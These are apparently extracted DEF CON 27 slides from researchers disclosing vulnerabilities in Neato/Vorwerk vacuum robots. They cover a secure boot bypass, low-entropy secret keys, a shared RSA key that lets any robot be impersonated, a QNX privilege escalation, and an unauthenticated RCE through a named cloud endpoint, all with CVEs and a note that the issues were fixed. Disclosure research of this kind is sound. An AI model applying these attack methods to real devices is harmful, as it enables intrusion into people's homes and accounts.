DEF CON 27- JISKA FABIAN - vacuum cleaning security
- 1. Vacuum Cleaning Security
Pinky and the Brain Edition
Jiska Classen
Secure Mobile Networking Lab - SEEMOO
Technische Universität Darmstadt, Germany
Fabian Ullrich
IT Security Analyst @ ERNW GmbH
Heidelberg, Germany
- 2. 2
● A vacuum cleaning robot is in your house, has access to your Wi-Fi and knows
many of your personal habits.
● Who of you owns a vacuum cleaning robot?
● (Own as it's YOUR robot, neither your neighbor's nor someone's on the Internet!)
Motivation
- 3. 3
● A vacuum cleaning robot is in your house, has access to your Wi-Fi and knows
many of your personal habits.
● Who of you owns a vacuum cleaning robot?
● Neato is one of the top vacuum cleaning robot models in the US.
● In Germany, Vorwerk has been selling vacuum cleaners forever (founded 1883).
Their top model, a robot, is a rebranded Neato.
● Vorwerk won the test comparisons in Germany with their VR300/VR200.
Motivation
- 4. 4
● Robots were harmed during our experiments! (Sorry for that…)
● No customer data was leaked.
● Neato was informed and fixed all issues in time.
Responsible Disclosure
- 8. 8
Infrastructure & Security Features
Nucleo
Beehive
UI & USB console
Manual robot
commands
Setup only
??
Robot commands / status
Account information
Robot commands, status responses
- 9. 9
Infrastructure & Security Features
Nucleo
Beehive
✔ HTTPS
✔ RSA key (robot↔cloud)
??
✔ HTTPS
✔ Secure boot
✔ Encrypted logs
✔ Signed firmware updates
✔ HTTPS
✔ RSA key (robot↔cloud)
✔ Secret key (robot↔user)
✔ HTTPS
✔ Secret key (robot↔user)
✔ Secret key (robot↔user)
- 10. 10
● With all these security features, what could possibly go wrong?
Contributions
- 11. 11
● With all these security features, what could possibly go wrong?
● We bypass secure boot on a vacuum cleaning robot to extract its memory.
● Our key findings are…
○ … key findings!
○ And a QNX side quest.
● We also gained unauthenticated RCE on robots over the cloud.
Contributions
- 12. 12
● Custom AM335x chip (guessed by size factor).
● QNX 6.5 image from Foundry27 is bootable but crashes.
● Get QNX SDP, modify image, skip hardware initialization,
reboot Neato system into custom image for cold boot attack,
print all RAM to the serial port.
● Watchdog started by Pinky,
● Cleaning logic binary started by Brain.
Secure Boot Bypass
Jiska found this, got assigned CVE-2018-20785, fixed in Neato BotVac Connected D7 4.4.0-72 in December 2018 and for Vorwerk somewhen after January 2019.
- 13. 13
Secret Key
● Generated when associating a robot with a user account.
● Known by: robot, app and cloud components.
● Individual key for each robot/user account relation!
Used for authenticating commands to robot.
Keys and their Purpose (1)
https://developers.neatorobotics.com/
- 14. 14
Secret Key
● Generated when associating a robot with a user account.
● Known by: robot, app and cloud components.
● Individual key for each robot/user account relation!
Used for authenticating commands to robot.
Keys and their Purpose (1)
Header = Authorization: NEATOAPP [signature]
1 string_to_sign = serial + date + message_body
2 signature = HMAC_SHA256(secret_key, string_to_sign)
https://developers.neatorobotics.com/
- 15. 15
RSA Key
● Robots have to initially send the secret key
○ Has to be authenticated.
● Secret key not that secret
○ Several third parties know it.
○ Cannot be used to authenticate the robot in the cloud.
RSA Key used to authenticate robot to cloud.
Keys and their Purpose (2)
- 16. 16
RSA Key
● Robots have to initially send the secret key
○ Has to be authenticated.
● Secret key not that secret
○ Several third parties know it.
○ Cannot be used to authenticate the robot in the cloud.
RSA Key used to authenticate robot to cloud.
Keys and their Purpose (2)
Header = Authorization: NEATOBOT [serial]:[signature]
1 string_to_sign = serial + http_method + URI + date + body
2 signature = sign_rsa_sha256(string_to_sign, rsa_private_key)
- 17. 17
Secret Key Entropy Reduction
Fabian found and analyzed this beautiful piece of code! Got assigned CVE-2018-19441.
1 rnd = rand();
2
3 time_shift[0:3] = time_now;
4 time_shift[4:6] = 0;
5 time_shift[7] = 16;
6 time_shift[8] = rnd + rnd / 0xFFFF;
7 time_shift[9] = entropy_reducing_math(rnd + rnd / 0xFFFF);
8 time_shift[10:15] = robot_MAC;
- 18. 18
Secret Key Entropy Reduction
Fabian found and analyzed this beautiful piece of code! Got assigned CVE-2018-19441.
1 rnd = rand();
2
3 time_shift[0:3] = time_now;
4 time_shift[4:6] = 0;
5 time_shift[7] = 16;
6 time_shift[8] = rnd + rnd / 0xFFFF;
7 time_shift[9] = entropy_reducing_math(rnd + rnd / 0xFFFF);
8 time_shift[10:15] = robot_MAC;
- 19. 19
● Entropy relies on time of robot linkage.
○ One year = 25 bit
○ One hour = 12 bit
● There are multiple offline attack scenarios.
Secret Key Entropy Reduction
Fabian found and analyzed this beautiful piece of code! Got assigned CVE-2018-19441.
1 rnd = rand();
2
3 time_shift[0:3] = time_now;
4 time_shift[4:6] = 0;
5 time_shift[7] = 16;
6 time_shift[8] = rnd + rnd / 0xFFFF;
7 time_shift[9] = entropy_reducing_math(rnd + rnd / 0xFFFF);
8 time_shift[10:15] = robot_MAC;
- 20. 20
● Encrypted RSA keys in /var/keys.
● vendorPrivateKeyProduction sounds promising!
● Let’s do some string de-obfuscation!
RSA Keys for Robot Authenticity (1)
- 21. 21
● Encrypted RSA keys in /var/keys.
● vendorPrivateKeyProduction sounds promising!
● Let’s do some string de-obfuscation!
RSA Keys for Robot Authenticity (1)
● RSA key is the same for all robots.
- 22. 22
● Encrypted RSA keys in /var/keys.
● vendorPrivateKeyProduction sounds promising!
● Let’s do some string de-obfuscation!
RSA Keys for Robot Authenticity (1)
● RSA key is the same for all robots.
- 23. 23
● We are able to impersonate arbitrary robots.
○ Allows for multiple other attacks.
○ For example: Leak victim’s smartphone IP
RSA Keys for Robot Authenticity (2)
Nucleo
Robotlocation?
- 24. 24
● We are able to impersonate arbitrary robots.
○ Allows for multiple other attacks.
○ For example: Leak victim’s smartphone IP
RSA Keys for Robot Authenticity (2)
Nucleo
Does no
longer get
requests
Robotlocation?
Robot location?
- 25. 25
● We are able to impersonate arbitrary robots.
○ Allows for multiple other attacks.
○ For example: Leak victim’s smartphone IP
RSA Keys for Robot Authenticity (2)
Nucleo
Does no
longer get
requests
Robotlocation?
Robot location?
Robot location is 1.3.3.7:42
- 26. 26
● We are able to impersonate arbitrary robots.
○ Allows for multiple other attacks.
○ For example: Leak victim’s smartphone IP.
RSA Keys for Robot Authenticity (2)
Nucleo
Does no
longer get
requests
Robotlocation?
Robot location?
Robot location is 1.3.3.7:42
1.3.3.7:42
- 27. 27
● We are able to impersonate arbitrary robots.
○ Allows for multiple other attacks.
○ For example: Leak victim’s smartphone IP
RSA Keys for Robot Authenticity (2)
Nucleo
Does no
longer get
requests
Manual drive…
1.3.3.7:42
Robotlocation?
Robot location?
Robot location is 1.3.3.7:42
1.3.3.7:42
- 28. 28
● Power plants, cars, and other critical applications run on QNX < 6.6. Today.
● The current version is 7.x, but many vendors might not have updated it so far.
● Default settings are no ASLR, no DEP :).
● The robots run on QNX 6.5 … Side quest: How secure is it?
We ❤ QNX < 6.6
Fabian and Johannes created a PoC for privilege escalation and got assigned CVE-2019-8998. http://support.blackberry.com/kb/articleDetail?articleNumber=000057178
- 29. 29
● Power plants, cars, and other critical applications run on QNX < 6.6. Today.
● The current version is 7.x, but many vendors might not have updated it so far.
● Default settings are no ASLR, no DEP :).
● The robots run on QNX 6.5 … Side quest: How secure is it?
We ❤ QNX < 6.6
Fabian and Johannes created a PoC for privilege escalation and got assigned CVE-2019-8998. http://support.blackberry.com/kb/articleDetail?articleNumber=000057178
- 30. 30
● Buffer overflow in Nucleo cloud connection
daemon.
Unauthenticated RCE
Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177), Johannes did further analysis and implemented a PoC (CVE-2018-19442).
Nucleo
/bin/astro /bin/robot
Buffer
Overflow
- 31. 31
● Buffer overflow in Nucleo cloud connection
daemon.
● Can be triggered with requests to
https://nucleo.neatocloud.com:4443/
vendors/neato/robots/[robot_serial]/
messages.
● The overflow is within parsing the authentication
header, which means that we found an
unauthenticated RCE!
● All services run as root.
● Fix: Authentication headers are validated on
Nucleo.
Unauthenticated RCE
Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177), Johannes did further analysis and implemented a PoC (CVE-2018-19442).
Nucleo
/bin/astro /bin/robot
Buffer
Overflow
- 32. 32
● IoT product at home? Keep it offline!
● As a customer:
○ Update your robot.
○ Hide your robot’s serial number!
Security Implications (1)
- 33. 33
● Connected ecosystem developers:
○ Using RSA, RNG, hashing, secure boot, encrypted logs, signed firmware updates
sounds good...
○ Review cryptographic key components and root of trust assumptions.
○ Dissecting one of your products should not compromise security of the other
products, i.e., similar keys.
○ Test your security relevant code in practice
to uncover issues like the static secret key
“random” function—check entropy before
hashing.
Security Implications (2)